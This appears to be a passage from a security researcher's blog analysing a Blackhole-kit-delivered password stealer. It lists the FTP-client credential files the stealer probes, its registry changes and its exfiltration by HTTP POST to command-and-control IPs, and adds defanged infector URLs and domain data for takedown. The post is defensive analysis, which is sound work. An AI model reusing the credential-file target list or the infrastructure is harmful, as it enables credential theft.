.text:0040B554  00000779 C vo8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8
.text:0041172C  00000177 C o8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho.text:0041B0A4  000000DD C ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho3\a
.text:0041C984  00000626 C ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8
.text:00425BDC  00000477 C 8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho

What kind of data has been stolen??

What this file did was shocky, it was trying to open/load autoexec & every internet account related software's configuration file as per detected in the below list:
c:\autoexec.bat [Open File Attempt Detected]
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID [Open File Attempt Detected]
C:\WINDOWS\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Program Files\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\WINDOWS\32BitFtp.ini [Open File Attempt Detected]
C:\DOCUME~1\~1\LOCALS~1\Temp\Client Hash [Open File Attempt Detected]
Well, this explains how credentials got stolen.... all version autoexec.bat/ famous FTP softwares, FileZilla, FlashFXP + etc credential was grabbed...

Registry Activity

These are the registry data read:
Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ], 
     Value Name: [ CUAS ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ], 
     Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
Key: [ HKLM\SYSTEM\Setup ], 
     Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], 
     Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ], 
     Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ], 
     Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ], 
     Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
While, it added the below keys:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR, and
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal
with putting the below values:
HWID: 7B 38 38 45 38 35 31 37 37 2D 42 44 38 38 2D 34 33 45 34 2D 39 32 32 33 2D 39 39 45 43 38 34 42 31 33 38 34 42 7D , and -
C:\Documents and Settings\\My Documents 
The malware also read & took your IE data as - per traced in below's mutex:
//Read IE internet history...
0x4ac c:!documents and settings!user!cookies!
0x4ac c:!documents and settings!user!local settings!history!history.ie5!
0x4ac c:!documents and settings!user!local settings!temporary internet files!content.ie5!
The malware also opened the backdoor w/below service:
Bind to Host:  localhost
ServiceName: SERVICES_ACTIVE_DATABASE 
Port: (MACHINE_DNS_SERVER) TCP/53 (DNS)

Network Activity

How the taken data sent can be described in the section. 1. Sent data to remote host via HTTP/1.1 POST to below HOST:PORT
180.235.150.72:8080 203.113.98.131:80 173.224.221.135:8080 206.176.226.157:8080
2. While other connection establishment attempts also detected to IP:
132.248.49.112 113.130.65.77
The complete recorded comm.data is in the PCAP data, the summary of above connection can be seen here -->>[HERE] ↑we can assume the CnC of this operation are at those IP lists. 3. The Password Stealer exp2.tmp.exe was downloaded from these hosts. Below is the capture..

Are we suppose to laugh??

These moronz are making a sick joke by putting many strings of "HO HO HO.." Let's just shutdown all of the service/IP/Domain related to this infection - and let's see who will laugh "HO HO HO" in the end (facepalm)

To fellow "Good Guys" / Researchers

The malware sanple can be downloaded here --->>[CLICK] PCAP & RegShot can be downloaded here --->>[CLICK] ThreatExpert reference exists (not so details though..)--->>[CLICK] Below is the infector and the long BHEK2's cracked url list:
-------------------------------------------------------
INFECTOR      BHEK2 LOONG URL :-)
-------------------------------------------------------
payload:       h00p://pelamutrika[.]ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
field.swf:     h00p://pelamutrika[.]ru:8080/forum/links/column.php?vmsxmw=30:1n:1i:1i:33&dpr=2w:3g:3d:36:3c&knusk=2v:1k:1m:32:33:1k:1k:31:1j:1o&vtsf=clq
score.swf:     h00p://pelamutrika[.]ru:8080/forum/links/column.php?vmsxmw=30:1n:1i:1i:33&dpr=2w:3g:3d:36:3c&knusk=2v:1k:1m:32:33:1k:1k:31:1j:1o&vtsf=clq
infector1.pdf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?qxwfe=30:1n:1i:1i:33&anaxw=38:3e:3h&kfcb=2v:1k:1m:32:33:1k:1k:31:1j:1o&zzsp=1k:1d:1f:1d:1g:1d:1f
infector2.pdf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?zxztpaa=30:1n:1i:1i:33&evx=3e&sev=2v:1k:1m:32:33:1k:1k:31:1j:1o&uaauvo=1k:1d:1f:1d:1g:1d:1f

For the Shutdown Purpose

domain:        PELAMUTRIKA.RU
nserver:       ns1.pelamutrika.ru. 62.76.189.72
nserver:       ns2.pelamutrika.ru. 41.168.5.140
nserver:       ns3.pelamutrika.ru. 132.248.49.112
nserver:       ns4.pelamutrika.ru. 209.51.221.247
nserver:       ns5.pelamutrika.ru. 208.87.243.196
nserver:       ns6.pelamutrika.ru. 216.99.149.226
pelamutrika.ru  A  42.121.116.38
pelamutrika.ru  A  202.180.221.186
pelamutrika.ru  A  208.87.243.131
pelamutrika.ru  A  212.162.52.180
pelamutrika.ru  A  212.162.56.210

state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     NAUNET-REG-RIPN
admin-contact: https://client.naunet.ru/c/whoiscontact
created:       2012.11.25
paid-till:     2013.11.25
free-date:     2013.12.26
source:        TCI
Last updated on 2012.12.09 19:06:53 MSK

3 comments:

  1. Pssst! Did you hear some bad-*ss moronz just cursing? :P

    ReplyDelete
  2. These BadActor Moronz is moving their BHEK server into SECURENETZ-DE VPS with domains & IP below:

    ganiopatia.ru A 212.162.52.180
    pelamutrika.ru A 212.162.52.180
    aliamognoa.ru A 212.162.52.180
    ahiontota.ru A 212.162.52.180
    anifkailood.ru A 212.162.52.180
    genevaonline.ru A 212.162.52.180
    podarunoki.ru A 212.162.52.180
    aseniakrol.ru A 212.162.52.180
    pitoniamason.ru A 212.162.52.180
    dimarikanko.ru A 212.162.52.180

    ganiopatia.ru A 212.162.56.210
    pelamutrika.ru A 212.162.56.210
    aliamognoa.ru A 212.162.56.210
    ahiontota.ru A 212.162.56.210
    anifkailood.ru A 212.162.56.210
    genevaonline.ru A 212.162.56.210
    podarunoki.ru A 212.162.56.210
    aseniakrol.ru A 212.162.56.210
    pitoniamason.ru A 212.162.56.210
    dimarikanko.ru A 212.162.56.210

    ReplyDelete
  3. They actually are moving IP, here's the other IP same VPS:

    ahiontota.ru A 212.162.13.230 <NEW DOMAINS in NEW VPS IP ADDRESS
    anifkailood.ru A 212.162.13.230
    podarunoki.ru A 212.162.13.230
    aseniakrol.ru A 212.162.13.230
    pitoniamason.ru A 212.162.13.230
    amnaosogo.ru A 212.162.13.230
    dimarikanko.ru A 212.162.13.230
    aofngppahgor.ru A 212.162.13.230

    ReplyDelete